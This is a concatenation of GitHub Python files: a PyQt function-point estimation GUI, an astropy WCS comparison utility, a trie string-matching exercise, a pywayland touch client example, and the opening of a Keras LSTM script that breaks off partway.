self.CodeSize_Label_2.setObjectName(\"CodeSize_Label_2\")\n self.label_19 = QtWidgets.QLabel(Form)\n self.label_19.setGeometry(QtCore.QRect(310, 490, 121, 31))\n font = QtGui.QFont()\n font.setPointSize(10)\n font.setBold(True)\n font.setWeight(75)\n self.label_19.setFont(font)\n self.label_19.setObjectName(\"label_19\")\n self.label_20 = QtWidgets.QLabel(Form)\n self.label_20.setGeometry(QtCore.QRect(20, 340, 81, 25))\n font = QtGui.QFont()\n font.setPointSize(10)\n font.setBold(True)\n font.setWeight(75)\n self.label_20.setFont(font)\n self.label_20.setObjectName(\"label_20\")\n self.VAF_Label_2 = QtWidgets.QLabel(Form)\n self.VAF_Label_2.setGeometry(QtCore.QRect(580, 440, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.VAF_Label_2.setFont(font)\n self.VAF_Label_2.setObjectName(\"VAF_Label_2\")\n self.horizontalLayoutWidget_10 = QtWidgets.QWidget(Form)\n self.horizontalLayoutWidget_10.setGeometry(QtCore.QRect(10, 90, 521, 31))\n 
self.horizontalLayoutWidget_10.setObjectName(\"horizontalLayoutWidget_10\")\n self.horizontalLayout_10 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_10)\n self.horizontalLayout_10.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_10.setObjectName(\"horizontalLayout_10\")\n self.label_21 = QtWidgets.QLabel(self.horizontalLayoutWidget_10)\n self.label_21.setObjectName(\"label_21\")\n self.horizontalLayout_10.addWidget(self.label_21)\n self.EI_lineedit_2 = QtWidgets.QLineEdit(self.horizontalLayoutWidget_10)\n self.EI_lineedit_2.setMinimumSize(QtCore.QSize(100, 0))\n self.EI_lineedit_2.setMaximumSize(QtCore.QSize(50, 16777215))\n self.EI_lineedit_2.setObjectName(\"EI_lineedit_2\")\n self.horizontalLayout_10.addWidget(self.EI_lineedit_2)\n self.radioButton_28 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_10)\n self.radioButton_28.setObjectName(\"radioButton_28\")\n self.horizontalLayout_10.addWidget(self.radioButton_28)\n self.radioButton_29 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_10)\n self.radioButton_29.setObjectName(\"radioButton_29\")\n self.horizontalLayout_10.addWidget(self.radioButton_29)\n self.radioButton_30 = QtWidgets.QRadioButton(self.horizontalLayoutWidget_10)\n self.radioButton_30.setObjectName(\"radioButton_30\")\n self.horizontalLayout_10.addWidget(self.radioButton_30)\n self.EInq_Label_2 = QtWidgets.QLabel(Form)\n self.EInq_Label_2.setGeometry(QtCore.QRect(580, 200, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.EInq_Label_2.setFont(font)\n self.EInq_Label_2.setObjectName(\"EInq_Label_2\")\n self.label_22 = QtWidgets.QLabel(Form)\n self.label_22.setGeometry(QtCore.QRect(240, 60, 47, 13))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_22.setFont(font)\n self.label_22.setObjectName(\"label_22\")\n self.EIF_Label_2 = QtWidgets.QLabel(Form)\n self.EIF_Label_2.setGeometry(QtCore.QRect(580, 300, 71, 16))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.EIF_Label_2.setFont(font)\n self.EIF_Label_2.setObjectName(\"EIF_Label_2\")\n\n # comment start\n self.chooselang_btn_2.clicked.connect(self.displaylang)\n self.vaf_btn_2.clicked.connect(self.vafdialog)\n self.computefp_btn_2.clicked.connect(self.calculatefp)\n self.EI_lineedit_2.setText(\"0\")\n self.EO_lineedit_2.setText(\"0\")\n self.EInq_lineedit_2.setText(\"0\")\n self.ILF_lineedit_2.setText(\"0\")\n self.EIF_lineedit_2.setText(\"0\")\n self.codesize_btn_2.clicked.connect(self.codesize)\n # comment end\n\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n\n def calculatefp(self):\n self.choice = 0\n try:\n if int(self.EI_lineedit_2.text()) < 0 or int(self.EO_lineedit_2.text()) < 0 or int(\n self.EInq_lineedit_2.text()) < 0 or int(self.ILF_lineedit_2.text()) < 0 or int(\n self.EIF_lineedit_2.text()) < 0:\n self.Error_Label.setText(\"Enter positive numbers only!\")\n self.Error_Label.setStyleSheet(\"color: red\")\n return\n except:\n self.Error_Label.setText(\"Enter numbers only!\")\n self.Error_Label.setStyleSheet(\"color: red\")\n return\n\n self.Error_Label.setText(\"\")\n self.ei = int(self.EI_lineedit_2.text())\n if self.radioButton_28.isChecked():\n self.choice = 3\n elif self.radioButton_29.isChecked():\n self.choice = 4\n elif self.radioButton_30.isChecked():\n self.choice = 6\n self.result = self.ei * self.choice\n self.EI_Label_2.setText(str(self.result))\n\n self.eo = int(self.EO_lineedit_2.text())\n if self.radioButton_16.isChecked():\n self.choice = 4\n elif self.radioButton_17.isChecked():\n self.choice = 5\n elif 
self.radioButton_18.isChecked():\n self.choice = 7\n self.result = self.eo * self.choice\n self.EO_Label_2.setText(str(self.result))\n\n self.einq = int(self.EInq_lineedit_2.text())\n if self.radioButton_22.isChecked():\n self.choice = 3\n elif self.radioButton_23.isChecked():\n self.choice = 4\n elif self.radioButton_24.isChecked():\n self.choice = 6\n self.result = self.einq * self.choice\n self.EInq_Label_2.setText(str(self.result))\n\n self.ilf = int(self.ILF_lineedit_2.text())\n if self.radioButton_19.isChecked():\n self.choice = 7\n elif self.radioButton_20.isChecked():\n self.choice = 10\n elif self.radioButton_21.isChecked():\n self.choice = 15\n self.result = self.ilf * self.choice\n self.ILF_Label_2.setText(str(self.result))\n\n self.eif = int(self.EIF_lineedit_2.text())\n if self.radioButton_25.isChecked():\n self.choice = 5\n elif self.radioButton_26.isChecked():\n self.choice = 7\n elif self.radioButton_27.isChecked():\n self.choice = 10\n self.result = self.eif * self.choice\n self.EIF_Label_2.setText(str(self.result))\n\n # ********************\n self.totalcount = int(self.EI_Label_2.text()) + int(self.EO_Label_2.text()) + int(\n self.EInq_Label_2.text()) + int(self.ILF_Label_2.text()) + int(self.EIF_Label_2.text())\n self.TC_Label_2.setText(str(self.totalcount))\n self.vaf_value = int(self.VAF_Label_2.text())\n self.fp = self.totalcount * (Decimal('0.65') + (Decimal('0.01') * Decimal(self.vaf_value)))\n self.FP_Label_2.setText(str(int(self.fp)))\n # *********************\n\n def displaylang(self):\n self.Dialog_3 = QtWidgets.QDialog()\n self.codesizeobj = SE_select_language.Ui_Dialog()\n self.codesizeobj.setupUi(self.Dialog_3)\n self.Dialog_3.show()\n self.response = self.Dialog_3.exec_()\n\n if self.response == QtWidgets.QDialog.Accepted:\n self.displaylang_result, self.lang = self.codesizeobj.getvalue()\n\n def vafdialog(self):\n self.Dialog = QtWidgets.QDialog()\n self.vaf_obj = SE_VAF.Ui_Dialog()\n self.vaf_obj.setupUi(self.Dialog)\n self.Dialog.show()\n self.response = self.Dialog.exec_()\n\n if self.response == QtWidgets.QDialog.Accepted:\n self.VAF_Label_2.setText(str(self.vaf_obj.get_vaf_value()))\n\n def codesize(self):\n self.CodeSize_Label_2.setText(str(self.displaylang_result * int(self.fp)))\n self.Language_Label_2.setText(self.lang)\n\n def save(self):\n # self.new_dict[]\n # print(\"FP new dict contains {}\".format(self.new_dict))\n self.new_dict = {}\n self.new_dict[\"EI_lineedit\"] = self.EI_lineedit_2.text()\n self.new_dict[\"EO_lineedit\"] = self.EO_lineedit_2.text()\n self.new_dict[\"EInq_lineedit\"] = self.EInq_lineedit_2.text()\n self.new_dict[\"ILF_lineedit\"] = self.ILF_lineedit_2.text()\n self.new_dict[\"EIF_lineedit\"] = self.EIF_lineedit_2.text()\n ##\n self.new_dict[\"EI_Label\"] = self.EI_Label_2.text()\n self.new_dict[\"EO_Label\"] = self.EO_Label_2.text()\n self.new_dict[\"EInq_Label\"] = self.EInq_Label_2.text()\n self.new_dict[\"ILF_Label\"] = self.ILF_Label_2.text()\n self.new_dict[\"EIF_Label\"] = self.EIF_Label_2.text()\n self.new_dict[\"TC_Label\"] = self.TC_Label_2.text()\n self.new_dict[\"FP_Label\"] = self.FP_Label_2.text()\n self.new_dict[\"VAF_Label\"] = self.VAF_Label_2.text()\n self.new_dict[\"CodeSize_Label\"] = self.CodeSize_Label_2.text()\n ##\n if self.radioButton_28.isChecked():\n self.new_dict[\"radioButton_28\"] = True\n if self.radioButton_29.isChecked():\n self.new_dict[\"radioButton_29\"] = True\n if self.radioButton_30.isChecked():\n self.new_dict[\"radioButton_30\"] = True\n if self.radioButton_16.isChecked():\n 
self.new_dict[\"radioButton_16\"] = True\n if self.radioButton_17.isChecked():\n self.new_dict[\"radioButton_17\"] = True\n if self.radioButton_18.isChecked():\n self.new_dict[\"radioButton_18\"] = True\n if self.radioButton_22.isChecked():\n self.new_dict[\"radioButton_22\"] = True\n if self.radioButton_23.isChecked():\n self.new_dict[\"radioButton_23\"] = True\n if self.radioButton_24.isChecked():\n self.new_dict[\"radioButton_24\"] = True\n if self.radioButton_19.isChecked():\n self.new_dict[\"radioButton_19\"] = True\n if self.radioButton_20.isChecked():\n self.new_dict[\"radioButton_20\"] = True\n if self.radioButton_21.isChecked():\n self.new_dict[\"radioButton_21\"] = True\n if self.radioButton_25.isChecked():\n self.new_dict[\"radioButton_25\"] = True\n if self.radioButton_26.isChecked():\n self.new_dict[\"radioButton_26\"] = True\n if self.radioButton_27.isChecked():\n self.new_dict[\"radioButton_27\"] = True\n ##\n self.new_dict[\"language\"] = self.Language_Label_2.text()\n ##\n # print(\"FP is returning: {}\".format(self.new_dict))\n return self.new_dict\n\n def restore_data(self):\n self.EI_lineedit_2.setText(self.new_dict[\"EI_lineedit\"])\n self.EO_lineedit_2.setText(self.new_dict[\"EO_lineedit\"])\n self.EInq_lineedit_2.setText(self.new_dict[\"EInq_lineedit\"])\n self.ILF_lineedit_2.setText(self.new_dict[\"ILF_lineedit\"])\n self.EIF_lineedit_2.setText(self.new_dict[\"EIF_lineedit\"])\n self.EI_Label_2.setText(str(self.new_dict[\"EI_Label\"]))\n self.EO_Label_2.setText(self.new_dict[\"EO_Label\"])\n self.EInq_Label_2.setText(self.new_dict[\"EInq_Label\"])\n self.ILF_Label_2.setText(self.new_dict[\"ILF_Label\"])\n self.EIF_Label_2.setText(self.new_dict[\"EIF_Label\"])\n self.TC_Label_2.setText(self.new_dict[\"TC_Label\"])\n self.FP_Label_2.setText(self.new_dict[\"FP_Label\"])\n self.VAF_Label_2.setText(self.new_dict[\"VAF_Label\"])\n self.CodeSize_Label_2.setText(self.new_dict[\"CodeSize_Label\"])\n ##\n if \"radioButton_28\" in self.new_dict:\n self.radioButton_28.setChecked(True)\n if \"radioButton_29\" in self.new_dict:\n self.radioButton_29.setChecked(True)\n if \"radioButton_30\" in self.new_dict:\n self.radioButton_30.setChecked(True)\n if \"radioButton_16\" in self.new_dict:\n self.radioButton_16.setChecked(True)\n if \"radioButton_17\" in self.new_dict:\n self.radioButton_17.setChecked(True)\n if \"radioButton_18\" in self.new_dict:\n self.radioButton_18.setChecked(True)\n if \"radioButton_22\" in self.new_dict:\n self.radioButton_22.setChecked(True)\n if \"radioButton_23\" in self.new_dict:\n self.radioButton_23.setChecked(True)\n if \"radioButton_24\" in self.new_dict:\n self.radioButton_24.setChecked(True)\n if \"radioButton_19\" in self.new_dict:\n self.radioButton_19.setChecked(True)\n if \"radioButton_20\" in self.new_dict:\n self.radioButton_20.setChecked(True)\n if \"radioButton_21\" in self.new_dict:\n self.radioButton_21.setChecked(True)\n if \"radioButton_25\" in self.new_dict:\n self.radioButton_25.setChecked(True)\n if \"radioButton_26\" in self.new_dict:\n self.radioButton_26.setChecked(True)\n if \"radioButton_27\" in self.new_dict:\n self.radioButton_27.setChecked(True)\n #\n if self.new_dict[\"language\"] == \"Assembler\":\n self.displaylang_result, self.lang = (337, \"Assembler\")\n self.Language_Label_2.setText(\"Assembler\")\n elif self.new_dict[\"language\"] == \"ADA\":\n self.displaylang_result, self.lang = (154, \"ADA\")\n self.Language_Label_2.setText(\"ADA\")\n elif self.new_dict[\"language\"] == \"C\":\n self.displaylang_result, self.lang = 
(148,\"C\")\n self.Language_Label_2.setText(\"C\")\n elif self.new_dict[\"language\"] == \"C++\":\n self.displaylang_result, self.lang = (59, \"C++\")\n self.Language_Label_2.setText(\"C++\")\n elif self.new_dict[\"language\"] == \"C#\":\n self.displaylang_result, self.lang = (58, \"C#\")\n self.Language_Label_2.setText(\"C#\")\n elif self.new_dict[\"language\"] == \"COBOL\":\n self.displaylang_result, self.lang = (80, \"COBOL\")\n self.Language_Label_2.setText(\"COBOL\")\n if self.new_dict[\"language\"] == \"FORTRAN\":\n self.displaylang_result, self.lang = (90, \"FORTRAN\")\n self.Language_Label_2.setText(\"FORTRAN\")\n elif self.new_dict[\"language\"] == \"HTML\":\n self.displaylang_result, self.lang = (43, \"HTML\")\n self.Language_Label_2.setText(\"HTML\")\n elif self.new_dict[\"language\"] == \"Java\":\n self.displaylang_result, self.lang = (55, \"Java\")\n self.Language_Label_2.setText(\"Java\")\n elif self.new_dict[\"language\"] == \"JavaScript\":\n self.displaylang_result, self.lang = (54, \"JavaScript\")\n self.Language_Label_2.setText(\"JavaScript\")\n elif self.new_dict[\"language\"] == \"VB Script\":\n self.displaylang_result, self.lang = (38, \"VB Script\")\n self.Language_Label_2.setText(\"VB Script\")\n elif self.new_dict[\"language\"] == \"Visual Basic\":\n self.displaylang_result, self.lang = (50, \"Visual Basic\")\n self.Language_Label_2.setText(\"Visual Basic\")\n\n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate\n Form.setWindowTitle(_translate(\"Form\", \"Form\"))\n self.label_12.setText(_translate(\"Form\", \"Complex\"))\n self.ILF_Label_2.setText(_translate(\"Form\", \"0\"))\n self.label_13.setText(_translate(\"Form\", \"Average\"))\n self.label_14.setText(_translate(\"Form\", \"External Outputs\"))\n self.radioButton_16.setText(_translate(\"Form\", \"4\"))\n self.radioButton_17.setText(_translate(\"Form\", \"5\"))\n self.radioButton_18.setText(_translate(\"Form\", \"7\"))\n self.FP_Label_2.setText(_translate(\"Form\", \"0\"))\n self.label_15.setText(_translate(\"Form\", \"Weighting Factors\"))\n self.EO_Label_2.setText(_translate(\"Form\", \"0\"))\n self.EI_Label_2.setText(_translate(\"Form\", \"0\"))\n self.label_16.setText(_translate(\"Form\", \"Internal Logic Files\"))\n self.radioButton_19.setText(_translate(\"Form\", \"7\"))\n self.radioButton_20.setText(_translate(\"Form\", \"10\"))\n self.radioButton_21.setText(_translate(\"Form\", \"15\"))\n self.TC_Label_2.setText(_translate(\"Form\", \"0\"))\n self.label_17.setText(_translate(\"Form\", \"External Inquiries\"))\n self.radioButton_22.setText(_translate(\"Form\", \"3\"))\n self.radioButton_23.setText(_translate(\"Form\", \"4\"))\n self.radioButton_24.setText(_translate(\"Form\", \"6\"))\n self.Language_Label_2.setText(_translate(\"Form\", \"None\"))\n self.label_18.setText(_translate(\"Form\", \"Ext Interface Files\"))\n self.radioButton_25.setText(_translate(\"Form\", \"5\"))\n self.radioButton_26.setText(_translate(\"Form\", \"7\"))\n self.radioButton_27.setText(_translate(\"Form\", \"10\"))\n self.computefp_btn_2.setText(_translate(\"Form\", \"Compute FP\"))\n self.vaf_btn_2.setText(_translate(\"Form\", \"Value Adjustments\"))\n self.codesize_btn_2.setText(_translate(\"Form\", \"Compute Code Size\"))\n self.chooselang_btn_2.setText(_translate(\"Form\", \"Change Language\"))\n self.CodeSize_Label_2.setText(_translate(\"Form\", \"0\"))\n self.label_19.setText(_translate(\"Form\", \"Current Language\"))\n self.label_20.setText(_translate(\"Form\", \"Total Count\"))\n 
self.VAF_Label_2.setText(_translate(\"Form\", \"0\"))\n self.label_21.setText(_translate(\"Form\", \"External Inputs\"))\n self.radioButton_28.setText(_translate(\"Form\", \"3\"))\n self.radioButton_29.setText(_translate(\"Form\", \"4\"))\n self.radioButton_30.setText(_translate(\"Form\", \"6\"))\n self.EInq_Label_2.setText(_translate(\"Form\", \"0\"))\n self.label_22.setText(_translate(\"Form\", \"Simple\"))\n self.EIF_Label_2.setText(_translate(\"Form\", \"0\"))\n self.radioButton_29.setChecked(True)\n self.radioButton_17.setChecked(True)\n self.radioButton_23.setChecked(True)\n self.radioButton_20.setChecked(True)\n self.radioButton_26.setChecked(True)\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtWidgets.QApplication(sys.argv)\n Form = QtWidgets.QWidget()\n ui = Ui_Form()\n ui.setupUi(Form, \"First\")\n Form.show()\n sys.exit(app.exec_())\n","repo_name":"roshangardi/FunctionPointGUI","sub_path":"SE_application/SE_functionPoint.py","file_name":"SE_functionPoint.py","file_ext":"py","file_size_in_byte":29025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18120024161","text":"from astropy import wcs as pywcs\nfrom collections import OrderedDict\nfrom astropy.io import fits\nfrom .headerlet import parse_filename\nimport numpy as np\n\n\ndef is_wcs_identical(scifile, file2, sciextlist, fextlist, scikey=\" \",\n file2key=\" \", verbose=False):\n \"\"\"\n Compares the WCS solution of 2 files.\n\n Parameters\n ----------\n scifile: string\n name of file1 (usually science file)\n IRAF style extension syntax is accepted as well\n for example scifile[1] or scifile[sci,1]\n file2: string\n name of second file (for example headerlet)\n sciextlist - list\n a list of int or tuple ('SCI', 1), extensions in the first file\n fextlist - list\n a list of int or tuple ('SIPWCS', 1), extensions in the second file\n scikey: string\n alternate WCS key in scifile\n file2key: string\n alternate WCS key in file2\n verbose: bool\n True: print to stdout\n\n Notes\n -----\n These can be 2 science observations or 2 headerlets\n or a science observation and a headerlet. 
The two files\n    have the same WCS solution if the following are the same:\n\n    - rootname/destim\n    - primary WCS\n    - SIP coefficients\n    - NPOL distortion\n    - D2IM correction\n\n    \"\"\"\n    result = True\n    diff = OrderedDict()\n    fobj, fname, close_file = parse_filename(file2)\n    sciobj, sciname, close_scifile = parse_filename(scifile)\n    diff['file_names'] = [scifile, file2]\n    if get_rootname(scifile) != get_rootname(file2):\n        # logger.info('Rootnames do not match.')\n        diff['rootname'] = (\"%s: %s\" % (sciname, get_rootname(scifile)),\n                            \"%s: %s\" % (file2, get_rootname(file2)))\n        result = False\n    for i, j in zip(sciextlist, fextlist):\n        w1 = pywcs.WCS(sciobj[i].header, sciobj, key=scikey)\n        w2 = pywcs.WCS(fobj[j].header, fobj, key=file2key)\n        diff['extension'] = [get_extname_extnum(sciobj[i]), get_extname_extnum(fobj[j])]\n        if not np.allclose(w1.wcs.crval, w2.wcs.crval, rtol=10**(-7)):\n            # logger.info('CRVALs do not match')\n            diff['CRVAL'] = w1.wcs.crval, w2.wcs.crval\n            result = False\n        if not np.allclose(w1.wcs.crpix, w2.wcs.crpix, rtol=10**(-7)):\n            # logger.info('CRPIX do not match')\n            diff['CRPIX'] = w1.wcs.crpix, w2.wcs.crpix\n            result = False\n        if not np.allclose(w1.wcs.cd, w2.wcs.cd, rtol=10**(-7)):\n            # logger.info('CDs do not match')\n            diff['CD'] = w1.wcs.cd, w2.wcs.cd\n            result = False\n        if not (np.array(w1.wcs.ctype) == np.array(w2.wcs.ctype)).all():\n            # logger.info('CTYPEs do not match')\n            diff['CTYPE'] = w1.wcs.ctype, w2.wcs.ctype\n            result = False\n        if w1.sip or w2.sip:\n            if (w2.sip and not w1.sip) or (w1.sip and not w2.sip):\n                diff['sip'] = 'one sip extension is missing'\n                result = False\n            if not np.allclose(w1.sip.a, w2.sip.a, rtol=10**(-7)):\n                diff['SIP_A'] = 'SIP_A differ'\n                result = False\n            if not np.allclose(w1.sip.b, w2.sip.b, rtol=10**(-7)):\n                # logger.info('SIP coefficients do not match')\n                diff['SIP_B'] = (w1.sip.b, w2.sip.b)\n                result = False\n        if w1.cpdis1 or w2.cpdis1:\n            if w1.cpdis1 and not w2.cpdis1 or w2.cpdis1 and not w1.cpdis1:\n                diff['CPDIS1'] = \"CPDIS1 missing\"\n                result = False\n            if w1.cpdis2 and not w2.cpdis2 or w2.cpdis2 and not w1.cpdis2:\n                diff['CPDIS2'] = \"CPDIS2 missing\"\n                result = False\n            if not np.allclose(w1.cpdis1.data, w2.cpdis1.data, rtol=10**(-7)):\n                # logger.info('NPOL distortions do not match')\n                diff['CPDIS1_data'] = (w1.cpdis1.data, w2.cpdis1.data)\n                result = False\n            if not np.allclose(w1.cpdis2.data, w2.cpdis2.data, rtol=10**(-7)):\n                # logger.info('NPOL distortions do not match')\n                diff['CPDIS2_data'] = (w1.cpdis2.data, w2.cpdis2.data)\n                result = False\n        if w1.det2im1 or w2.det2im1:\n            if w1.det2im1 and not w2.det2im1 or \\\n               w2.det2im1 and not w1.det2im1:\n                diff['DET2IM'] = \"Det2im1 missing\"\n                result = False\n            if not np.allclose(w1.det2im1.data, w2.det2im1.data, rtol=10**(-7)):\n                # logger.info('Det2Im corrections do not match')\n                diff['D2IM1_data'] = (w1.det2im1.data, w2.det2im1.data)\n                result = False\n        if w1.det2im2 or w2.det2im2:\n            if w1.det2im2 and not w2.det2im2 or \\\n               w2.det2im2 and not w1.det2im2:\n                diff['DET2IM2'] = \"Det2im2 missing\"\n                result = False\n            if not np.allclose(w1.det2im2.data, w2.det2im2.data, rtol=10**(-7)):\n                # logger.info('Det2Im corrections do not match')\n                diff['D2IM2_data'] = (w1.det2im2.data, w2.det2im2.data)\n                result = False\n    if not result and verbose:\n        for key in diff:\n            print(key, \":\\t\", diff[key][0], \"\\t\", diff[key][1])\n    if close_file:\n        fobj.close()\n    if close_scifile:\n        sciobj.close()\n    return result, diff\n\n\ndef get_rootname(fname):\n    \"\"\"\n    Returns the value of ROOTNAME or DESTIM\n    \"\"\"\n\n
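    # fall back from ROOTNAME to DESTIM, and finally to the raw file name\n    hdr = 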
fits.getheader(fname)\n try:\n rootname = hdr['ROOTNAME']\n except KeyError:\n try:\n rootname = hdr['DESTIM']\n except KeyError:\n rootname = fname\n return rootname\n\n\ndef get_extname_extnum(ext):\n \"\"\"\n Return (EXTNAME, EXTNUM) of a FITS extension\n \"\"\"\n extname = \"\"\n extnum = 1\n extname = ext.header.get('EXTNAME', extname)\n extnum = ext.header.get('EXTVER', extnum)\n return (extname, extnum)\n","repo_name":"spacetelescope/stwcs","sub_path":"stwcs/wcsutil/wcsdiff.py","file_name":"wcsdiff.py","file_ext":"py","file_size_in_byte":5947,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"1387417014","text":"from collections import defaultdict\nimport sys\ninput = sys.stdin.readline\n\n\nclass TrieNode:\n def __init__(self, key, data=None):\n self.children = defaultdict(str)\n self.key = key\n self.data = data\n\n\nclass Trie:\n def __init__(self):\n self.root = TrieNode(None)\n\n def insert(self, string):\n curr_node = self.root\n\n for char in string:\n if char not in curr_node.children:\n curr_node.children[char] = TrieNode(char)\n curr_node = curr_node.children[char]\n curr_node.data = string\n\n def search(self, string):\n curr_node = self.root\n\n for char in string:\n if char in curr_node.children:\n curr_node = curr_node.children[char]\n else:\n return False\n if curr_node.data:\n return True\n return False\n\n\nn, m = map(int, input().split())\ntrie = Trie()\ncnt = 0\nfor i in range(n + m):\n string = input().strip()\n if i < n:\n trie.insert(string)\n else:\n if trie.search(string):\n cnt += 1\nprint(cnt)\n\n","repo_name":"Dltmd202/BOJ-ProblemSlove","sub_path":"python/14425/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35516961485","text":"import mmap\nimport os\nimport sys\nimport tempfile\n\nthis_file = os.path.abspath(__file__)\nthis_dir = os.path.split(this_file)[0]\nroot_dir = os.path.split(this_dir)[0]\npywayland_dir = os.path.join(root_dir, \"pywayland\")\nif os.path.exists(pywayland_dir):\n sys.path.append(root_dir)\n\nfrom pywayland.client import Display # noqa: E402\nfrom pywayland.protocol.wayland import ( # noqa: E402\n WlCompositor,\n WlSeat,\n WlShell,\n WlShm,\n)\n\n\ndef create_shm_buffer(touch, width, height):\n stride = width * 4\n size = stride * height\n\n with tempfile.TemporaryFile() as f:\n f.write(b\"\\x64\" * size)\n f.flush()\n\n fd = f.fileno()\n touch[\"data\"] = mmap.mmap(\n fd, size, mmap.MAP_SHARED, mmap.PROT_READ | mmap.PROT_WRITE\n )\n pool = touch[\"shm\"].create_pool(fd, size)\n touch[\"buffer\"] = pool.create_buffer(\n 0, width, height, stride, WlShm.format.argb8888.value\n )\n pool.destroy()\n\n\ndef handle_touch_down(wl_touch, serial, time, surface, id, x, y):\n # touch = wl_touch.user_data\n # touch_paint(touch, x, y, id)\n return 0\n\n\ndef handle_touch_motion(wl_touch, time, id, x, y):\n # touch = wl_touch.user_data\n # touch_paint(touch, x, y, id)\n return 0\n\n\ndef handle_seat_capabilities(wl_seat, capabilities):\n print(\"capabilities\")\n seat = wl_seat.user_data\n touch = seat[\"touch\"]\n\n if (capabilities & WlSeat.capability.touch.value) and seat[\"wl_touch\"] is None:\n seat[\"wl_touch\"] = wl_seat.get_touch()\n seat[\"wl_touch\"].user_data = touch\n seat[\"wl_touch\"].dispatcher[\"down\"] = handle_touch_down\n # seat['wl_touch'].dispatcher['up'] = handle_touch_up\n seat[\"wl_touch\"].dispatcher[\"motion\"] = 
handle_touch_motion\n elif not (capabilities & WlSeat.capability.touch.value) and seat[\"wl_touch\"]:\n seat[\"wl_touch\"].destroy()\n seat[\"wl_touch\"] = None\n return 1\n\n\ndef handle_shm_format(wl_shm, fmt):\n print(\"format\")\n touch = wl_shm.user_data\n\n if fmt == WlShm.format.argb8888.value:\n touch[\"has_argb\"] = True\n return 1\n\n\ndef handle_shell_surface_ping(wl_shell_surface, serial):\n print(\"ping\")\n wl_shell_surface.pong(serial)\n return 1\n\n\ndef handle_registry_global(wl_registry, id_num, iface_name, version):\n print(\"global\", id_num, iface_name)\n\n touch = wl_registry.user_data\n if iface_name == \"wl_compositor\":\n touch[\"compositor\"] = wl_registry.bind(id_num, WlCompositor, version)\n elif iface_name == \"wl_seat\":\n seat = {}\n seat[\"touch\"] = touch\n seat[\"wl_touch\"] = None\n\n wl_seat = wl_registry.bind(id_num, WlSeat, version)\n wl_seat.dispatcher[\"capabilities\"] = handle_seat_capabilities\n wl_seat.user_data = seat\n seat[\"seat\"] = wl_seat\n elif iface_name == \"wl_shell\":\n touch[\"shell\"] = wl_registry.bind(id_num, WlShell, version)\n elif iface_name == \"wl_shm\":\n touch[\"has_argb\"] = False\n\n shm = wl_registry.bind(id_num, WlShm, version)\n shm.user_data = touch\n shm.dispatcher[\"format\"] = handle_shm_format\n touch[\"shm\"] = shm\n return 1\n\n\ndef touch_create(width, height):\n touch = {}\n\n # Make the display and get the registry\n touch[\"display\"] = Display()\n touch[\"display\"].connect()\n\n touch[\"registry\"] = touch[\"display\"].get_registry()\n touch[\"registry\"].user_data = touch\n touch[\"registry\"].dispatcher[\"global\"] = handle_registry_global\n\n touch[\"display\"].dispatch()\n touch[\"display\"].roundtrip()\n touch[\"display\"].roundtrip()\n\n if not touch[\"has_argb\"]:\n print(\"WL_SHM_FORMAT_ARGB32 not available\", file=sys.stderr)\n touch[\"display\"].disconnect()\n return\n\n touch[\"width\"] = width\n touch[\"height\"] = height\n touch[\"surface\"] = touch[\"compositor\"].create_surface()\n touch[\"shell_surface\"] = touch[\"shell\"].get_shell_surface(touch[\"surface\"])\n create_shm_buffer(touch, width, height)\n\n if touch[\"shell_surface\"]:\n print(\"shell\")\n touch[\"shell_surface\"].dispatcher[\"ping\"] = handle_shell_surface_ping\n touch[\"shell_surface\"].set_toplevel()\n\n touch[\"surface\"].user_data = touch\n touch[\"shell_surface\"].set_title(\"simple-touch\")\n\n touch[\"surface\"].attach(touch[\"buffer\"], 0, 0)\n touch[\"surface\"].damage(0, 0, width, height)\n touch[\"surface\"].commit()\n\n return touch\n\n\ndef main():\n touch = touch_create(600, 500)\n\n while touch[\"display\"].dispatch() != -1:\n pass\n\n touch[\"display\"].disconnect()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"flacjacket/pywayland","sub_path":"example/simple-touch.py","file_name":"simple-touch.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"48"} +{"seq_id":"29672134935","text":"# lstm model\nimport numpy as np\nimport time\nimport keras_metrics as km\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Flatten\nfrom keras.layers import Dropout\nfrom keras.layers import LSTM\n\nimport tensorflow as tf\nsess = tf.Session(config=tf.ConfigProto(log_device_placement=True))\n\ntrainX = np.loadtxt('X_train.txt', delimiter=\" \")\ntrainy = np.loadtxt('y_train.txt')\ntestX = np.loadtxt('Xs_test.txt', delimiter=\" \")\ntesty = np.loadtxt('ys_test.txt')\n\nxmin = 
